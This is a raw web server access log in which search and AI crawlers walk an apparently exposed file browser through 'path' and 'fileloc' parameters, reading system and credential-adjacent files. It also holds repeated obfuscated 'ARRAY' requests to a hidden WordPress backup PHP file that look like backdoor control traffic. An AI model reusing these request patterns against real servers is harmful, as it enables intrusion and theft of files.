74.7.227.189 - - [09/Nov/2025:01:01:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/cpu1/firmware_node/subsystem/drivers/battery HTTP/1.0" 200 3359 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:27 +0000] "GET /220ahzpn3852.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/firmware_node/subsystem/drivers/ec HTTP/1.0" 200 3350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.212.219.113 - - [09/Nov/2025:01:01:31 +0000] "GET /video/san-xuat-phim-quang-cao/?path=//lib/eject HTTP/1.0" 200 3161 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:01:31 +0000] "GET /13omfdv37923.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:36 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/cpu1/firmware_node/power HTTP/1.0" 200 3584 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.73.47.24 - - [09/Nov/2025:01:01:36 +0000] "GET /our-works/tvc-caltex-havoline/?path=//lib/apache2/modules HTTP/1.0" 200 6993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:01:38 +0000] "GET /155angjg3691.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.229.164.203 - - [09/Nov/2025:01:01:39 +0000] "GET /our-works/tvc-jokky/?fileloc=//bin/gpgconf&path=//bin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:01:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory15/node0/cpu0/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:40 +0000] "GET /249lrlgp5753.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.248.20 - - [09/Nov/2025:00:59:21 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635333536302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393936302q6237636164373961373836326138633661313661303337383062373166643665222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
98.83.10.183 - - [09/Nov/2025:01:01:43 +0000] "GET /our-works/tvc-kimino/?path=//proc/scsi/sg HTTP/1.0" 200 3374 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:01:44 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Fvideo%2Fuvesafb.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Fvideo HTTP/1.0" 200 4098 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:01:44 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu1/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:44 +0000] "GET /86hmuuy48228.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.210.213.220 - - [09/Nov/2025:01:01:45 +0000] "GET /our-works/tvc-kimiko-bo-sung-prebiotics/?path=//sys/class/dmi HTTP/1.0" 200 3133 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:01:45 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:45 +0000] "GET /32rcqzq26616.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:47 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu0/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:47 +0000] "GET /234gehll8346.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.175.228 - - [09/Nov/2025:01:01:50 +0000] "GET /our-works/tvc-calci/?path=//proc/12/task HTTP/1.0" 200 3131 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:01:50 +0000] "GET /141derrc1405.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:01:51 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu0/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3706 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:54 +0000] "GET /97cdwny35993.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.205.74.196 - - [09/Nov/2025:01:01:55 +0000] "GET /our-works/tvc-sjc/?path=//proc/16 HTTP/1.0" 200 4711 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:01:55 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory12/node0/cpu0/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3706 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:01:57 +0000] "GET /72urwow49750.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:01:58 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fjs%2Fsrc%2Ftable%2Fchange.js&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fjs%2Fsrc%2Ftable HTTP/1.0" 200 11258 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:01:59 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu0/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3706 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.72.95.195 - - [09/Nov/2025:01:01:59 +0000] "GET /our-works/tvc-jokky/?fileloc=//bin/phar7.4&path=//bin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
66.249.66.41 - - [09/Nov/2025:01:02:00 +0000] "GET /?products=1550117742 HTTP/1.0" 200 26094 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.51 - - [09/Nov/2025:01:02:01 +0000] "GET /65afbdo11041.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
100.29.160.53 - - [09/Nov/2025:01:02:02 +0000] "GET /our-works/tvc-caltex-havoline/?fileloc=//etc/logrotate.d/rsyslog&path=//etc/logrotate.d HTTP/1.0" 200 2993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:02:03 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory10/node0/cpu0/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:03 +0000] "GET /33lorqf44945.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.225.98.148 - - [09/Nov/2025:01:02:05 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//proc/zoneinfo&path=//proc HTTP/1.0" 200 3674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:00:59:44 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635333538342p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323634393938342q6462653936663033393232393765346138303334646665633562663064353465222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.51 - - [09/Nov/2025:01:02:05 +0000] "GET /40valva17902.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu1/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:06 +0000] "GET /74zwdjj45006.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:07 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu0/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:07 +0000] "GET /58lspwx34406.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.225.9.97 - - [09/Nov/2025:01:02:08 +0000] "GET /our-works/intracom-riverside/?fileloc=//bin/dbus-monitor&path=//bin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:02:08 +0000] "GET /173bymib4747.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:09 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory10/node0/cpu1/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3710 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
40.77.167.151 - - [09/Nov/2025:01:02:09 +0000] "GET /?products=54021450 HTTP/1.0" 200 180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:02:10 +0000] "GET /87hdulm41047.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:11 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory13/node0/cpu1/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:11 +0000] "GET /33lorqf44945.html?path=/var/www HTTP/1.0" 200 3947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:02:12 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Ftrace%2Fevents%2Firq_matrix.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Ftrace%2Fevents HTTP/1.0" 200 3631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.214.238.178 - - [09/Nov/2025:01:02:13 +0000] "GET /our-works/tvc-jokky/?fileloc=//home/ubuntu/.sudo_as_admin_successful&path=//home/ubuntu HTTP/1.0" 200 2834 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:02:13 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/subsystem/drivers/processor/cpu1/topology/core_siblings&path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 2961 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:14 +0000] "GET /247znytl9991.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:15 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/cpu1/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:16 +0000] "GET /178pvxaf2780.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory13/node0/cpu1/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.89.90.224 - - [09/Nov/2025:01:02:17 +0000] "GET /our-works/3d-film/tvc-motion-graphic-artubus/?path=//var/cache/pollinate HTTP/1.0" 200 2884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [09/Nov/2025:01:02:17 +0000] "GET /239miyhi3217.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:18 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu1/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:19 +0000] "GET /46gtycp35114.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:19 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory12/node0/cpu1/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3706 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:20 +0000] "GET /38xxlwt12178.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.73.167.217 - - [09/Nov/2025:01:02:20 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/delv&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:02:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:21 +0000] "GET /62mbtac25214.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:23 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu1/subsystem/drivers/processor/cpu1/topology/die_id&path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory11/node0/cpu1/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 2956 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:23 +0000] "GET /240igepi9026.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.204.152.114 - - [09/Nov/2025:01:02:24 +0000] "GET /our-works/tvc-bia-hello/?fileloc=//usr/bin/delv&path=//usr/bin HTTP/1.0" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:02:24 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory12/node0/cpu1/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:25 +0000] "GET /283eahgz9837.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:26 +0000] "GET /33lorqf44945.html?path=/var/www/fastuser HTTP/1.0" 200 2882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory13/node0/cpu1/firmware_node/subsystem/drivers/hpet HTTP/1.0" 200 3352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:28 +0000] "GET /33rzlmk29805.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:02:28 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fjs%2Fsrc%2Fwebauthn.js&path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fjs%2Fsrc HTTP/1.0" 200 3885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.218.103.254 - - [09/Nov/2025:01:02:30 +0000] "GET /video/san-xuat-phim-quang-cao/?fileloc=//bin/column&path=//bin HTTP/1.0" 200 2809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:02:30 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory15/node0/cpu1/subsystem/drivers/processor/cpu0/topology HTTP/1.0" 200 3709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:31 +0000] "GET /254uwmea2866.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:02:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory15/node0/cpu1/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:33 +0000] "GET /156nqhdd6358.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.225.181.161 - - [09/Nov/2025:01:02:33 +0000] "GET /our-works/tvc-bia-hello/?path=//proc/fs/nfsd HTTP/1.0" 200 2879 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:01:00:13 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635333630362p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323635303030362q6163306431326166633234316332633833663265646531343233353139633034222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.189 - - [09/Nov/2025:01:02:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory15/node0/cpu1/subsystem/drivers/processor/cpu1/topology HTTP/1.0" 200 3704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:02:35 +0000] "GET /48hylfq47756.html?path=/var/www/lamphim/data/www HTTP/1.0" 200 3165 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
